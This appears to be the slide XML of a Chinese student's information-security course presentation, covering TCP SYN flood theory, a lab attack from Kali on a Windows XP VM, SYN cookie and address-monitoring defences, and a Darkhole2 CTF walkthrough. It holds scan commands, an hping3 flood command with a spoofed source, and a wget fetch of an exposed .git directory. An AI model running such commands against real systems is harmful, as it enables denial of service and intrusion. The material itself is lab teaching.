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6" r:id="rId4"/>
    <p:sldMasterId id="2147483660" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="3233" r:id="rId6"/>
    <p:sldId id="3226" r:id="rId8"/>
    <p:sldId id="3366" r:id="rId9"/>
    <p:sldId id="3367" r:id="rId10"/>
    <p:sldId id="3368" r:id="rId11"/>
    <p:sldId id="3369" r:id="rId12"/>
    <p:sldId id="3370" r:id="rId13"/>
    <p:sldId id="3371" r:id="rId14"/>
    <p:sldId id="3372" r:id="rId15"/>
    <p:sldId id="3231" r:id="rId16"/>
    <p:sldId id="3321" r:id="rId17"/>
    <p:sldId id="3350" r:id="rId18"/>
    <p:sldId id="3280" r:id="rId19"/>
    <p:sldId id="3336" r:id="rId20"/>
    <p:sldId id="3351" r:id="rId21"/>
    <p:sldId id="3352" r:id="rId22"/>
    <p:sldId id="3355" r:id="rId23"/>
    <p:sldId id="3374" r:id="rId24"/>
    <p:sldId id="3376" r:id="rId25"/>
    <p:sldId id="3377" r:id="rId26"/>
    <p:sldId id="3378" r:id="rId27"/>
    <p:sldId id="3380" r:id="rId28"/>
    <p:sldId id="3381" r:id="rId29"/>
    <p:sldId id="3382" r:id="rId30"/>
    <p:sldId id="3383" r:id="rId31"/>
    <p:sldId id="3384" r:id="rId32"/>
    <p:sldId id="3396" r:id="rId33"/>
    <p:sldId id="3385" r:id="rId34"/>
    <p:sldId id="3397" r:id="rId35"/>
    <p:sldId id="3398" r:id="rId36"/>
    <p:sldId id="3386" r:id="rId37"/>
    <p:sldId id="3387" r:id="rId38"/>
    <p:sldId id="3388" r:id="rId39"/>
    <p:sldId id="3389" r:id="rId40"/>
    <p:sldId id="3390" r:id="rId41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3233"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="目录" id="{4B3991B8-79CA-4EB6-9CA3-FC301B75ECCE}">
          <p14:sldIdLst>
            <p14:sldId id="3226"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="内容" id="{18816BB6-9D16-4BDC-8D4C-61DCA91C8176}">
          <p14:sldIdLst>
            <p14:sldId id="3366"/>
            <p14:sldId id="3367"/>
            <p14:sldId id="3368"/>
            <p14:sldId id="3369"/>
            <p14:sldId id="3370"/>
            <p14:sldId id="3371"/>
            <p14:sldId id="3372"/>
            <p14:sldId id="3231"/>
            <p14:sldId id="3321"/>
            <p14:sldId id="3350"/>
            <p14:sldId id="3280"/>
            <p14:sldId id="3336"/>
            <p14:sldId id="3351"/>
            <p14:sldId id="3352"/>
            <p14:sldId id="3355"/>
            <p14:sldId id="3374"/>
            <p14:sldId id="3376"/>
            <p14:sldId id="3377"/>
            <p14:sldId id="3378"/>
            <p14:sldId id="3380"/>
            <p14:sldId id="3381"/>
            <p14:sldId id="3382"/>
            <p14:sldId id="3383"/>
            <p14:sldId id="3384"/>
            <p14:sldId id="3396"/>
            <p14:sldId id="3385"/>
            <p14:sldId id="3397"/>
            <p14:sldId id="3398"/>
            <p14:sldId id="3386"/>
            <p14:sldId id="3387"/>
            <p14:sldId id="3388"/>
            <p14:sldId id="3389"/>
            <p14:sldId id="3390"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="封底" id="{843E591D-6EE2-4691-951C-C0C689F22170}">
          <p14:sldIdLst/>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="4" pos="876" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3886" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="4249" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="2251" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="4112" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="5967" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="6425" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" pos="2343" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="3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AC"/>
    <a:srgbClr val="4473B3"/>
    <a:srgbClr val="1F4D78"/>
    <a:srgbClr val="9AB3D6"/>
    <a:srgbClr val="F4EEE8"/>
    <a:srgbClr val="1A53A2"/>
    <a:srgbClr val="339FDB"/>
    <a:srgbClr val="1A93D6"/>
    <a:srgbClr val="0087D2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8" autoAdjust="0"/>
    <p:restoredTop sz="94173" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="206" y="53"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="876"/>
        <p:guide orient="horz" pos="3886"/>
        <p:guide orient="horz" pos="4249"/>
        <p:guide pos="2251"/>
        <p:guide pos="4112"/>
        <p:guide pos="5967"/>
        <p:guide pos="6425"/>
        <p:guide pos="2343"/>
        <p:guide orient="horz" pos="3319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69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="1971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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag37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已经保存了修改后的版本，如果有问题的话，可以再改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可能英语一起放下面好点？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调整了字体为微软雅黑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Wireshake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark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(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>删去多余的如果（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）应该不是超时未收到，应该是超时未监听到（毕竟不是直接传给工具）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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8141335" y="0"/>
            <a:ext cx="2625090" cy="1936115"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F4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V="1">
            <a:off x="0" y="3406141"/>
            <a:ext cx="12192000" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F4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" y="2943225"/>
            <a:ext cx="6527800" cy="97155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S1iḋé"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8141073" y="0"/>
            <a:ext cx="4755655" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 54216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9525000" ty="0" sx="100000" sy="100000" flip="x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270" y="3809365"/>
            <a:ext cx="11936095" cy="393636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2548890"/>
            <a:ext cx="12192000" cy="1361440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F4D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" y="2377590"/>
            <a:ext cx="12191999" cy="927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/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5038090" y="68580"/>
            <a:ext cx="2115820" cy="1978660"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 34883"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3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 descr="电院logo-单球-白5-0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20615" y="29210"/>
            <a:ext cx="2316480" cy="1847215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1" y="3993030"/>
            <a:ext cx="12191999" cy="927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:\年底PPT\电院图片\电院1号楼-陈秋文 3.jpg电院1号楼-陈秋文 3"/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-4185285" y="-49530"/>
            <a:ext cx="10464165" cy="6975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>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-211044" y="60906"/>
            <a:ext cx="6506204" cy="6865039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/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/>
          <p:cNvSpPr txBox="1"/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/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/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4" b="24994"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-12656"/>
            <a:ext cx="12192000" cy="431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>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-23447"/>
            <a:ext cx="12192000" cy="4324182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/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/>
          <p:cNvSpPr txBox="1"/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/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1523037" y="951043"/>
            <a:ext cx="2437257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1F4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6712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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1105110" y="3428365"/>
            <a:ext cx="2101020" cy="2015089"/>
            <a:chOff x="1048224" y="3047028"/>
            <a:chExt cx="2862843" cy="2991505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20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1F4D78"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1F4D7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/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9143026" y="1052071"/>
            <a:ext cx="2667000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663407" y="6359418"/>
            <a:ext cx="618856" cy="2493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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEIEE</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78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2" name="图片 1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4445"/>
            <a:ext cx="2110740" cy="2110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663407" y="6359418"/>
            <a:ext cx="618856" cy="2493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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEIEE</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78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545" y="-55041"/>
            <a:ext cx="4836455" cy="1547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88A1B-3EBB-421E-9713-E036BA5CC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DDC17-209B-4058-B72B-CFAA515678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sp>
        <p:nvSpPr>
          <p:cNvPr id="6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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663407" y="6359418"/>
            <a:ext cx="618856" cy="2493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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEIEE</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78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2" name="图片 1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260" y="4445"/>
            <a:ext cx="2110740" cy="21107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1F4D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6712"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1105110" y="3428365"/>
            <a:ext cx="2101020" cy="2015089"/>
            <a:chOff x="1048224" y="3047028"/>
            <a:chExt cx="2862843" cy="2991505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/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1F4D78"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1F4D7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/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9143026" y="1052071"/>
            <a:ext cx="2667000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8.png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88A1B-3EBB-421E-9713-E036BA5CCE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DDC17-209B-4058-B72B-CFAA51567817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10"/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/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4"/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1F4D7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Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663407" y="6359418"/>
            <a:ext cx="618856" cy="24930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1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEIEE</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="http://photo-static-api.fotomore.com/creative/vcg/400/version23/VCG41455438505.jpg" descr="templates\picture_hover\&amp;pky120_sjzg_VCG41455438505&amp;2&amp;src_toppic_inpsrchzd1&amp;"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="51953" r="6941"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8886825" y="563880"/>
            <a:ext cx="3328035" cy="57296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openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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2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710532" y="5139554"/>
            <a:ext cx="2770937" cy="953271"/>
            <a:chOff x="5105369" y="4062207"/>
            <a:chExt cx="2770937" cy="953271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="voice-microphone-symbol_26706"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5322417" y="4337859"/>
              <a:ext cx="313559" cy="401966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2828" h="608768">
                  <a:moveTo>
                    <a:pt x="26237" y="155244"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64831" y="155244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64831" y="309528"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64831" y="395814"/>
                    <a:pt x="135135" y="466021"/>
                    <a:pt x="221541" y="466021"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308070" y="466021"/>
                    <a:pt x="378375" y="395814"/>
                    <a:pt x="378375" y="309528"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="378375" y="155244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416846" y="155244"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="416846" y="155244"/>
                    <a:pt x="444132" y="171446"/>
                    <a:pt x="442780" y="188261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442043" y="198939"/>
                    <a:pt x="428031" y="210968"/>
                    <a:pt x="416846" y="218946"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="416846" y="309528"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="416846" y="401215"/>
                    <a:pt x="353055" y="478295"/>
                    <a:pt x="267510" y="499039"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="267510" y="567527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303277" y="567527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303277" y="608768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267510" y="608768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175327" y="608768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139560" y="608768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139560" y="567527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175327" y="567527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175327" y="498916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="89904" y="478173"/>
                    <a:pt x="26237" y="401092"/>
                    <a:pt x="26237" y="309528"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26237" y="219191"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15052" y="211091"/>
                    <a:pt x="794" y="198939"/>
                    <a:pt x="57" y="188261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-1418" y="170341"/>
                    <a:pt x="26237" y="155244"/>
                    <a:pt x="26237" y="155244"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="221393" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282227" y="0"/>
                    <a:pt x="331510" y="49215"/>
                    <a:pt x="331510" y="109967"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="331510" y="298236"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="331510" y="358865"/>
                    <a:pt x="282227" y="408080"/>
                    <a:pt x="221393" y="408080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160557" y="408080"/>
                    <a:pt x="111275" y="358865"/>
                    <a:pt x="111275" y="298236"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111275" y="109967"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="111275" y="49215"/>
                    <a:pt x="160557" y="0"/>
                    <a:pt x="2213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标题 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105369" y="4062207"/>
              <a:ext cx="2770937" cy="953271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2F55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ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>汇报人</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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2400" y="2814320"/>
            <a:ext cx="93465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信息安全实践期末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81880" y="4646930"/>
            <a:ext cx="2717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吴舒文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 521030910087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90926" y="3698956"/>
            <a:ext cx="1743242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9600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9600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itre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574085" y="4403888"/>
            <a:ext cx="6055690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rgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>泛洪（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Espace réservé du texte 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574085" y="5441535"/>
            <a:ext cx="8218481" cy="5702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基于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TCP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协议三次握手中的状态转换</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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三次握手原理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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896223" y="4046550"/>
            <a:ext cx="10399554" cy="2981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当接收端收到来自发送端的初始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报文时，向发送端返回一个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SYN+ACK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报文。接收端在等待发送端的最终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报文时，该连接一直处于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半连接状态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。如果接收端最终没有收到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报文包，则重新发送一个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SYN+ACK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到发送端。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如果经过多次重试，发送端始终没有返回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ACK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报文，则接收端关闭会话并从内存中刷新会话，从传输第一个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SYN+ACK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到会话关闭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大约需要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秒。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在这段时间内，攻击者可能将数十万个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报文发送到开放的端口，并且不回应接收端的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SYN+ACK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报文。接收端内存很快就会超过负荷，且无法再接受任何新的连接，并将现有的连接断开。</a:t>
            </a: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8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img-blog.csdn.net/20180808105159546?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2p1bjIwMTY0MjU=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/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746" y="1219199"/>
            <a:ext cx="7011830" cy="28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泛洪攻击实战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1260" y="4445"/>
            <a:ext cx="2110740" cy="2110740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本占位符 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790575" y="144399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确认靶机（此处使用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Windows XP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虚拟机）、攻击机（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Kali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扫描活动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fping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-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asg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xxx.xxx.xxx.xxx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/xx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（网络掩码）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半连接扫描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TCP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开放端口：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nmap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-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sS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XXX.XXX.XXX.XXX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发起泛洪攻击：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hping3 -q -n -a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攻击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-S -s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源端口 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--keep -p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目的端口 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--flood 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被攻击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 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其中：攻击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可虚构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28078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泛洪攻击实战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1260" y="4445"/>
            <a:ext cx="2110740" cy="2110740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本占位符 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790575" y="1443990"/>
            <a:ext cx="11168062" cy="3970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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2673985"/>
            <a:ext cx="5389137" cy="5145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攻击前：靶机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占用率很低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攻击机发起攻击时：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占用率骤然提升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6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8505" y="1139190"/>
            <a:ext cx="4878705" cy="5069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1888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泛洪攻击防范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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441218" y="1171575"/>
            <a:ext cx="10626832" cy="4781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8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SYN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cookie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－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cookie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技术针对标准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TCP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连接建立过程资源分配上的缺陷，改变了资源分配的策略。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当服务器收到一个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报文后，不立即分配缓冲区，而是利用连接的信息生成一个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cookie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，并将其作为将要返回的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＋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ACK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报文的初始序列号。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当客户端返回一个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ACK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报文时，根据包头信息计算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cookie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，与返回的确认序列号的进行对比，若是一个符合要求的正常连接，则分配资源，建立连接。　　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该技术的关键点在于避免了在连接信息未完全到达前进行资源分配，使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SYN Flood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攻击的资源消耗失效。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800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31888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泛洪攻击防范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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441218" y="1171574"/>
            <a:ext cx="10626832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地址状态监控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利用监控工具对网络中的有关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TCP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连接的数据包进行监控并处理。处理的主要依据是连接请求的源地址。源地址总共有四种状态：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初态：任何源地址刚开始的状态； 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状态：第一次出现或出现多次也不能断定存在的源地址的状态；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GOOD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状态：断定存在的源地址所处的状态；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BAD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状态：源地址不存在或不可达时所处的状态。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217" y="2998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泛洪攻击防范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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441217" y="1038225"/>
            <a:ext cx="10626832" cy="4781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地址状态监控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）监听到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包，如果源地址是第一次出现，则置该源地址的状态为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状态；如果是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状态或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BAD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状态；则将该包的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RST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然后重新发出去，如果是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GOOD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状态不作处理　　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）监听到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ACK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RST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包，如果源地址的状态为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状态，则转为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GOOD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状态；如果是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GOOD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状态则不变；如果是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BAD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状态则转为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状态。　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80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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）监听到从服务器来的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SYN ACK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报文，表明服务器已经为从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addr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发来的连接请求建立了一个半连接，为防止建立的半连接过多，向服务器发送一个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ACK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包，建立连接，开始同时计时，如果超时还未监听到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ACK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报文，证明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addr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不可达。如果此时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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addr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的状态为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GOOD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则转为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状态；如果为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状态则转为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BAD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状态；如果为状态为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BAD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状态则不变。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90926" y="3698956"/>
            <a:ext cx="1743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9600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itre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574085" y="4404475"/>
            <a:ext cx="6055690" cy="6642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/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1F4D78"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>渗透练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F4D78"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Espace réservé du texte 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574085" y="5403748"/>
            <a:ext cx="8218481" cy="64579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Vulnhub darkhole2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虚拟机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DARKHOLE-2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Darkhole2是vulnhub上的CTF虚拟机，作者将其难度标为hard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23410" y="1985645"/>
            <a:ext cx="2882900" cy="4184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DARKHOLE-2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查看靶机默认登录页面，发现并不能进行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注入攻击，因此寻找其他页面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24125" y="1712595"/>
            <a:ext cx="6445250" cy="48202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6725" y="5300166"/>
            <a:ext cx="3124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en-US" altLang="zh-CN" sz="2400" b="1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钓鱼网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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&amp;DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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95800" y="5300345"/>
            <a:ext cx="3026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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1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TCP SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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泛洪攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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400" b="1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9115" y="5300345"/>
            <a:ext cx="2819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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1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渗透练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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Darkhole2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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wget&amp;git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利用wget下载虚拟机中的git仓库：wget -r http://192.168.186.147/.git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克隆得到的git库包含.git文件。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84960" y="2490470"/>
